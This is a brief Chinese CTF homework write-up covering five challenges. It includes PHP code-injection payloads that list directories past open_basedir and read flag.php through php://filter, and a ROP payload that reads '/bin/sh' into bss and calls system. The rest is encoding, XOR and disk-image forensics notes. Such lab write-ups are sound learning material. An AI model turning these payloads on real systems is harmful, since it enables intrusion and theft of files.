2.15作业

1

开始就要GET$a

根目录没有权限读文件，可以用glob://伪协议绕过open_basedir

?a= $a=new DirectoryIterator("glob:///*");
foreach($a as $f)
{echo($f->__toString().' ');
}

/?a=print_r(scandir(%27.%27));

 ?a=echo"hello";?><?php include($_GET['b']);&b=php://filter/read=convert.base64-encode/resource=flag.php

2

好多=，quoted-printable编码

3彻底失去她

没有/bin/sh,调用read【sendline(b'/bin/sh\x00')】读到bss上

system=elf.plt['system']

read=elf.sym['read']

bss=0x4040A0

pl=b'a'*(0xA+8)
pl+=p64(pop_rdi_r)+p64(0)
pl+=p64(pop_rsi_r)+p64(bss)#要预先写好读的空间大小read(0,buf,0x10)
pl+=p64(pop_rdx_r)+p64(0x10)
pl+=p64(read)
pl+=p64(pop_rdi_r)+p64(bss)
pl+=p64(system)

4Base64PLUS

base64+异或0xE

解：异或0xE，再base64

5Disk

虚拟磁盘图像文件（如vmdk）

010永远的神，复制二进制，转文本

做完看wp，有个工具：AccessData FTK Imager，比较好看，以后可能会用到，留个屁股在这里